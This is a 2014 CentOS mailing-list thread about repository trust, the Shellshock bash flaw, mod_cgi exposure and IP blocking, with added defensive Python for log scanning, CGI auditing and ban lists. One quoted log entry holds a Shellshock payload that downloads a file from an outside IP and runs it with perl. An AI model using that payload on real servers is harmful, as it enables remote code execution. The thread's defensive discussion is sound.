On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
> Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
James B. Byrne wrote:
> On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
>> Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
> You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
Assuming this gets through - my hosting provider's mailhost is being blocked, AGAIN, by those assholes at IX magazine that run nixspam....
It's still not one of the large repos, and (if you didn't see my other response), we have no knowledge of how secure his server, where he hosts his repo, is from being hacked. We *do* have to, legally, worry about HIPAA (personal health data) and PII data.
We'll ignore the concept of telling scores of people that they have to not use the browser they know, and have to learn a new one....
mark
On Fri, September 26, 2014 11:56 am, James B. Byrne wrote:
> On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
>> Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
> You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
I hope, "my" government doesn't go into alliance with Russia behind my back ;-) (I'm perfectly OK about Romania, no matter how much more careful I'll be about repositories hosted there compared to the ones hosted, say, in Finland, just based on statistics of compromised machines...)
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev wrote:
> On Fri, September 26, 2014 11:56 am, James B. Byrne wrote:
>> On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
>>> Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
>> You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
> I hope, "my" government doesn't go into alliance with Russia behind my back ;-) (I'm perfectly OK about Romania, no matter how much more careful I'll be about repositories hosted there compared to the ones hosted, say, in Finland, just based on statistics of compromised machines...)
Please, please note: we're *NOT* US DoD* - we try to help people.... <g>
What, you're not looking forward to the Ukraine hosting repos...?
mark
* Old, old t-shirt line: join the Army, travel to distant lands, meet exotic people, and learn to kill them.
> I hope, "my" government doesn't go into alliance with Russia behind my back ;-) (I'm perfectly OK about Romania, no matter how much more careful I'll be about repositories hosted there compared to the ones hosted, say, in Finland, just based on statistics of compromised machines...)
These guys they just don't get the hint and then we have to watch in disgust their heads being cut off by the friends of Libya :)
On 9/26/2014 2:51 PM, Always Learning wrote:
> Probably all Windoze
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""
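The probe John logs above is recognisable by the `() {` prefix in a request header that mod_cgi would export into the script's environment. As an added example (my code, not anything posted in this thread or shipped with Apache), here is a small Python scanner over Apache combined-format log lines that flags requests carrying that marker in the User-Agent or Referer field and groups them by client address. The log lines are constructed sample data using documentation addresses, not the poster's log; the function and class names are mine.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Apache "combined" LogFormat:
#   ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# A header value that starts with "() {" is a bash function definition; a
# vulnerable bash parsed and executed such values from its environment.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')


@dataclass
class Hit:
    ip: str
    time: str
    request: str
    status: int
    field: str   # which header carried the marker ("agent" or "referer")
    value: str


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def find_shellshock_probes(lines):
    """Scan log lines and return a Hit for each request carrying the marker."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue   # not combined format: skip rather than guess
        for field in ("agent", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append(Hit(rec["ip"], rec["time"], rec["request"],
                                int(rec["status"]), field, rec[field]))
                break  # one Hit per request is enough for triage
    return hits


def probes_by_ip(hits):
    """Count flagged requests per client address (dict: ip -> count)."""
    return dict(Counter(h.ip for h in hits))


# Constructed sample log (documentation address ranges, harmless probe bodies).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh HTTP/1.0" '
    '404 294 "-" "() { :;}; echo probe"',
    '198.51.100.23 - - [26/Sep/2014:00:50:01 -0700] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [26/Sep/2014:00:51:12 -0700] "GET /cgi-bin/status HTTP/1.0" '
    '200 118 "() { :;}; echo probe" "curl/7.19.7"',
]

if __name__ == "__main__":
    for h in find_shellshock_probes(SAMPLE_LOG):
        print(f"{h.ip} {h.time} {h.request!r} status={h.status} via {h.field}: {h.value!r}")
    print(probes_by_ip(find_shellshock_probes(SAMPLE_LOG)))
```

The status column is worth keeping in the output: the 404 on the first sample line mirrors the posted log entry, where the requested script path did not exist, while the second hit shows the same marker smuggled in the Referer with a 200, which is the case to escalate first.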
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
> On 9/26/2014 2:51 PM, Always Learning wrote:
>> Probably all Windoze
> linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
> 66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right? ;-)
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
On 2014-09-26, Valeri Galtsev galtsev@kicp.uchicago.edu wrote:
> On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
>> linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
>> 66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
> I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right? ;-)
At first glance I would agree with you, but then I would wonder, if that request wouldn't work almost anywhere, why are the skr1pt k1dd13s doing it?
--keith
On Sat, Sep 27, 2014 at 11:02 AM, Keith Keller < kkeller@wombat.san-francisco.ca.us> wrote:
> On 2014-09-26, Valeri Galtsev galtsev@kicp.uchicago.edu wrote:
>> On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
>>> linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
>>> 66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
>> I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right? ;-)
> At first glance I would agree with you, but then I would wonder, if that request wouldn't work almost anywhere, why are the skr1pt k1dd13s doing it?
Old source versions of Apache used to come with a test.sh file in the default cgi-bin directory, but those days are long gone, I suspect.
Cheers,
Cliff
On 9/26/2014 3:36 PM, Valeri Galtsev wrote:
> On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
>> On 9/26/2014 2:51 PM, Always Learning wrote:
>>> Probably all Windoze
>> linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
>> 66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
> I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right?
no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
On Fri, September 26, 2014 6:05 pm, John R Pierce wrote:
> On 9/26/2014 3:36 PM, Valeri Galtsev wrote:
>> On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
>>> On 9/26/2014 2:51 PM, Always Learning wrote:
>>>> Probably all Windoze
>>> linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
>>> 66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
>> I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right?
> no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh
Damn, indeed it is not sh, but symlink to bash. Crap! Am I already to that extent FreeBSD and not Linux guy...
Ba
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
On 2014-09-26, John R Pierce pierce@hogranch.com wrote:
> On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
>> 66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
> no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
Wouldn't you need a particular Apache configuration for mod_cgi to launch /bin/sh? e.g., /cgi-bin/ configured as a ScriptAlias, and/or *.sh configured with an appropriate handler? Granted that's likely a common configuration, but a site without a configured /cgi-bin/ should be immune to this attack even if their /bin/sh is a symlink to /bin/bash.
--keith
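Keith asks whether mod_cgi needs a ScriptAlias or a cgi-script handler before a request can reach a shell at all, and John's point is that on this platform /bin/sh is bash. The Python below is an added example (mine, not from the thread or the httpd project) that reads an httpd configuration as text and reports which CGI-enabling directives are live, and separately checks whether /bin/sh resolves to bash. The two configuration snippets are constructed; the audit covers mod_cgi/mod_cgid directives only and says nothing about other programs that might spawn bash with request-derived environment variables. All names in it are mine.

```python
import os
import re

# Directives through which mod_cgi / mod_cgid become reachable from a request.
LOAD_CGI_RE = re.compile(r'^\s*LoadModule\s+cgid?_module\b', re.I)
SCRIPTALIAS_RE = re.compile(r'^\s*ScriptAlias(?:Match)?\s+(\S+)\s+(\S+)', re.I)
HANDLER_RE = re.compile(r'^\s*(?:Add|Set)Handler\s+cgi-script\b(.*)$', re.I)


def _options_enable_execcgi(line):
    """True for 'Options ExecCGI' or 'Options +ExecCGI'; '-ExecCGI' does not count."""
    tokens = line.split()
    if not tokens or tokens[0].lower() != "options":
        return False
    return any(t.lower() in ("execcgi", "+execcgi") for t in tokens[1:])


def cgi_exposure(config_text):
    """Summarise the CGI-related directives that are active in an httpd config.

    httpd treats '#' only at the start of a line as a comment, so commented-out
    directives are skipped exactly as the server would skip them.
    """
    report = {"cgi_module_loaded": False, "script_aliases": [],
              "cgi_handlers": [], "execcgi": 0}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if LOAD_CGI_RE.match(line):
            report["cgi_module_loaded"] = True
        m = SCRIPTALIAS_RE.match(line)
        if m:
            report["script_aliases"].append((m.group(1).strip('"'), m.group(2).strip('"')))
        m = HANDLER_RE.match(line)
        if m:
            report["cgi_handlers"].append(m.group(1).split())
        if _options_enable_execcgi(line):
            report["execcgi"] += 1
    # A request can only reach a CGI shell when the module is loaded AND some
    # path or extension is mapped to it.
    report["cgi_reachable"] = report["cgi_module_loaded"] and bool(
        report["script_aliases"] or report["cgi_handlers"] or report["execcgi"])
    return report


def sh_resolves_to_bash(sh_path="/bin/sh"):
    """True when the system's /bin/sh is a link to bash (the CentOS case in the thread)."""
    try:
        return os.path.basename(os.path.realpath(sh_path)) == "bash"
    except OSError:
        return False


# Constructed snippets: the stock-looking exposed layout, and one with CGI switched off.
EXPOSED_CONF = """
LoadModule cgi_module modules/mod_cgi.so
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
<Directory "/var/www/cgi-bin">
    AllowOverride None
    Options None
</Directory>
"""

HARDENED_CONF = """
# LoadModule cgi_module modules/mod_cgi.so
# ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
<Directory "/var/www/html">
    Options -ExecCGI
</Directory>
"""

if __name__ == "__main__":
    for name, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(name, cgi_exposure(conf))
    print("/bin/sh is bash:", sh_resolves_to_bash())
```

Run against a real installation you would feed it the concatenated contents of httpd.conf and conf.d/*.conf, since a ScriptAlias in a dropped-in vhost file counts just as much as one in the main file; the patch to bash remains the actual fix, and this only tells you how wide the CGI door is while you wait for it.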
Hi,
Anybody has bash package to Redhat 4 ?
tks
On Mon, Sep 29, 2014 at 11:33:08AM -0200, Eduardo Augusto Pinto wrote:
> Hi,
> Anybody has bash package to Redhat 4 ?
I imagine Red Hat does as they are providing support for EL4 still if you are willing to pay for it.
John
On Mon, Sep 29, 2014 at 8:41 AM, John R. Dennison jrd@gerdesas.com wrote:
> On Mon, Sep 29, 2014 at 11:33:08AM -0200, Eduardo Augusto Pinto wrote:
>> Hi,
>> Anybody has bash package to Redhat 4 ?
> I imagine Red Hat does as they are providing support for EL4 still if you are willing to pay for it.
Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
On Mon, Sep 29, 2014 at 09:54:45AM -0500, Les Mikesell wrote:
> Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
Or... you could pay Red Hat for support on the EOL release if you want it, you know... supported.
El4 went out of standard support on 2/29/2012. If you are still running EL4 and want updates pay for 'em.
John
This
On Sep 29, 2014, at 10:00 AM, John R. Dennison jrd@gerdesas.com wrote:
> On Mon, Sep 29, 2014 at 09:54:45AM -0500, Les Mikesell wrote:
>> Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
> Or... you could pay Red Hat for support on the EOL release if you want it, you know... supported.
> El4 went out of standard support on 2/29/2012. If you are still running EL4 and want updates pay for 'em.
> John
> -- When good is dumb, evil will always triumph.
> -- Jeff Atwood, 28 May 2008, Coding Horror Blog, 23 November 2000
Les Mikesell wrote:
> Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
They now have a more recent version available: bash-3.0-27.0.3.el4.src.rpm
James Pearson
On Fri, September 26, 2014 6:05 pm, John R Pierce wrote:
> On 9/26/2014 3:36 PM, Valeri Galtsev wrote:
>> On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
>>> On 9/26/2014 2:51 PM, Always Learning wrote:
>>>> Probably all Windoze
>>> linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
>>> 66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
>> I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right?
> no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
Apache passes it to mod_cgi to have that discover that referenced file doesn't exist?! Did I too program like that when I was programmer?
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
On Fri, 2014-09-26 at 16:05 -0700, John R Pierce wrote:
> no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
Don't use cgi. Have no /cgi directory. Don't load mod_cgi
Bash is patched (updated to new version). Automatically block IPs of anyone trying to hack Apache. Am I safe ?
Paul. England, EU.
Learning until I die or experience dementia.
On Fri, September 26, 2014 8:32 pm, Always Learning wrote:
> On Fri, 2014-09-26 at 16:05 -0700, John R Pierce wrote:
>> no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
> Don't use cgi. Have no /cgi directory. Don't load mod_cgi
> Bash is patched (updated to new version). Automatically block IPs of anyone trying to hack Apache. Am I safe ?
You are. But if you run the server you do want to serve what you want to serve. Now, imagine hotel, everybody in it is behind a single router. One person has hacked machine that tried to tap into your server. You block the IP, therefore everyone in Hotel... Now do you want to serve it? If not why to start Apache at all? However, my case is different. If servers of our Departments don't serve anything [we need] to everybody, they do not need me, sysadmin, desktop support guy will be more suitable (and probably less expensive).
Just my $0.02
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
Hi Valeri,
> On Fri, September 26, 2014 8:32 pm, Always Learning wrote:
>> Don't use cgi. Have no /cgi directory. Don't load mod_cgi
>> Bash is patched (updated to new version). Automatically block IPs of anyone trying to hack Apache. Am I safe ?
> You are. But if you run the server you do want to serve what you want to serve. Now, imagine hotel, everybody in it is behind a single router. One person has hacked machine that tried to tap into your server. You block the IP, therefore everyone in Hotel... Now do you want to serve it? If not why to start Apache at all? However, my case is different. If servers of our Departments don't serve anything [we need] to everybody, they do not need me, sysadmin, desktop support guy will be more suitable (and probably less expensive).
If a hacker, always using someone else's compromised computer, attempts to break-in, their IP is blocked for all traffic within about 1 second.
Yes that means one hacked computer's IP address is blocked for mail and web. I decline to let the hacker have repeated attempts to hack into, or abuse, any of my web sites.
If there are only a few access attempts after the IP address is blocked, the ban will expire monthly. If there are very many attempts, then the ban will expire about 3 weeks after the attempts stop.
If this inconveniences an innocent web user, I have neither ability to detect the inconvenience nor to determine the user's innocence. I understand your hotel analogue. In England many hotel guests use their mobile phones or tablets - not on wifi but on direct radio (mobile telephone) links; each link having a distinctive IP address.
If the web hacker is operating through a data centre, then I permanently block, for port 80, the whole of the data centre's known IP block.
The alternative is to be a willing victim.
Best regards,
Paul England - the USA's government's pet European poodle.
V,
Sorry that should be ...
I understand your hotel analogy.
P.
On Fri, Sep 26, 2014 at 10:38 PM, Always Learning centos@u62.u22.net wrote:
> If this inconveniences an innocent web user, I have neither ability to detect the inconvenience nor to determine the user's innocence. I understand your hotel analogue. In England many hotel guests use their mobile phones or tablets - not on wifi but on direct radio (mobile telephone) links; each link having a distinctive IP address.
> If the web hacker is operating through a data centre, then I permanently block, for port 80, the whole of the data centre's known IP block.
> The alternative is to be a willing victim.
It's more a question of why you run the service at all. If blocking people from reaching it doesn't bother you, why not just shut it down?
On Mon, 2014-09-29 at 12:16 -0500, Les Mikesell wrote:
> On Fri, Sep 26, 2014 at 10:38 PM, Always Learning centos@u62.u22.net wrote:
>> If this inconveniences an innocent web user, I have neither ability to detect the inconvenience nor to determine the user's innocence. I understand your hotel analogue. In England many hotel guests use their mobile phones or tablets - not on wifi but on direct radio (mobile telephone) links; each link having a distinctive IP address.
>> If the web hacker is operating through a data centre, then I permanently block, for port 80, the whole of the data centre's known IP block.
>> The alternative is to be a willing victim.
> It's more a question of why you run the service at all. If blocking people from reaching it doesn't bother you, why not just shut it down?
Blocking people ? Data Centre bots that download all or parts of my web sites for someone's personal amusement or for commercial gain of their customers or simply to find email addresses to use for spamming, are not the 'people' I want to attract.
Why should I tolerate some malicious nutter trying to hack into my web servers ? Better to block their IP after the first attempt.
Why should I close everything because of a very small, but very active, group of pests ? Better to block the compromised IPs and the rent-an-IP-address-for-a-few-hours services whilst letting everything else continue normally.
No logical reason to give spammers and hackers unrestricted access. Abuse my facilities and my systems will cut them off. It's a simple and effective policy.
On Mon, Sep 29, 2014 at 1:57 PM, Always Learning centos@u62.u22.net wrote:
>>> The alternative is to be a willing victim.
>> It's more a question of why you run the service at all. If blocking people from reaching it doesn't bother you, why not just shut it down?
> Blocking people ? Data Centre bots that download all or parts of my web sites for someone's personal amusement or for commercial gain of their customers or simply to find email addresses to use for spamming, are not the 'people' I want to attract.
You said you were blocking IPs. The IPs you see don't represent people or even specific devices and you have no way of knowing the correspondence.
> Why should I tolerate some malicious nutter trying to hack into my web servers ? Better to block their IP after the first attempt.
Why tolerate anyone?
On Mon, 2014-09-29 at 14:16 -0500, Les Mikesell wrote:
> You said you were blocking IPs.
Yes my systems block IPs on the basis:-
Emails: Block if IP allocated to a data centre or to a commercial email sending organisation.
Web: Hacking attempts - individual IP if a 'home-type' Internet connection. Block if IP allocated to a data centre.
Hosts (email):
Persistent pests using 'home-type' Internet connections are added to the spammers list. Example
*airtelbroadband.in *adsl.alicedsl.de *dynamic.se.alltele.net *alshamil.net.ae *adsl.anteldata.net.uy *aphie.info *pools.arcor-ip.net *static.arcor-ip.net *as9105.com *as13285.net *as43234.net
Thus no actual IPs are banned in this instance.
Duration: Individual IPs about 4 weeks. Blocks indefinite. Hosts lists indefinite.
> The IPs you see don't represent people or even specific devices and you have no way of knowing the correspondence.
I think genuine email senders will use a real MTA rather than something, taken from today's list, like:-
host-93-178-107-188.ttn.ru 249.119.233.72.static.reverse.ltdomains.com dab-yat1-h-61-9.dab.02.net
If the correspondence is genuinely important, then the sender will obviously know my details including phone number and/or postal address.
> Why tolerate anyone?
Because it is my systems, paid with my money, and therefore it is my choice to accept everyone - also my choice not to tolerate hacking attempts and junk mail. I previously stated I will not be a placid victim for hacking attacks or for spamming.
Long gone are the gentlemen's days of the Internet when mail relaying via third parties was acceptable, normal and never ever abused. Unless one can successfully adapt to the inevitable changes throughout life, one's existence is doomed.
I wish to stop this topic now and do other things.
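Paul's blocking scheme (individual 'home-type' addresses for about four weeks, whole data-centre blocks indefinitely, and a wildcard host list matched against reverse DNS names) and the objection from Les and Valeri that an address does not identify a person can both be seen in one small model. The Python below is an added example, not Paul's actual scripts and not anything posted in the thread; the netblock, host pattern and addresses are constructed from documentation ranges, the class and method names are mine, and as a simplification an individual ban's expiry is refreshed on every new attempt rather than tracking the "few versus many attempts" distinction he describes.

```python
import ipaddress
from datetime import datetime, timedelta
from fnmatch import fnmatch

# Constructed policy value modelled on the duration given in the thread.
INDIVIDUAL_BAN = timedelta(weeks=4)   # 'home-type' address: temporary, refreshed per attempt


class BanList:
    """Track blocked sources along the lines of the posted policy:

    - an address inside a known data-centre block bans the whole block, indefinitely
    - an address whose reverse DNS matches a wildcard pattern is refused by name
    - anything else is banned individually for INDIVIDUAL_BAN after each attempt
    """

    def __init__(self, datacentre_blocks, host_patterns):
        self.datacentre_blocks = [ipaddress.ip_network(b) for b in datacentre_blocks]
        self.host_patterns = list(host_patterns)   # fnmatch-style, e.g. "*.pool.example.net"
        self.individual = {}                       # ip_address -> expiry datetime
        self.blocked_networks = set()              # ip_network, no expiry

    def _host_listed(self, rdns):
        return bool(rdns) and any(fnmatch(rdns, p) for p in self.host_patterns)

    def record_attempt(self, ip, now, rdns=None):
        """Register one hacking/spam attempt and return which rule it triggered."""
        addr = ipaddress.ip_address(ip)
        for net in self.datacentre_blocks:
            if addr in net:
                self.blocked_networks.add(net)     # one offender bans the whole block
                return "network"
        if self._host_listed(rdns):
            return "hostlist"                      # already refused by name; no per-IP entry
        self.individual[addr] = now + INDIVIDUAL_BAN
        return "individual"

    def is_blocked(self, ip, now, rdns=None):
        """Decide whether a connection from ip (optionally with its rDNS name) is refused."""
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in self.blocked_networks):
            return True
        if self._host_listed(rdns):
            return True
        expiry = self.individual.get(addr)
        if expiry is None:
            return False
        if now >= expiry:
            del self.individual[addr]              # ban lapsed: the address is admitted again
            return False
        return True


if __name__ == "__main__":
    # Constructed demo: a data-centre block and a broadband-pool pattern.
    t0 = datetime(2014, 9, 29, 12, 0)
    bl = BanList(["198.51.100.0/24"], ["*.pool.example.net"])
    print(bl.record_attempt("203.0.113.7", t0))                 # individual
    print(bl.is_blocked("203.0.113.7", t0 + timedelta(days=1)))  # True
    print(bl.is_blocked("203.0.113.7", t0 + timedelta(weeks=5))) # False, expired
    print(bl.record_attempt("198.51.100.9", t0))                # network
    print(bl.is_blocked("198.51.100.200", t0))                  # True: whole /24
```

The hotel case Valeri raised is visible directly in the model: one `record_attempt` for a NAT address bans every guest behind it until the entry expires, and the network rule is deliberately broader still. That is the trade Les is pointing at; the code makes it explicit rather than hiding it behind a per-IP counter.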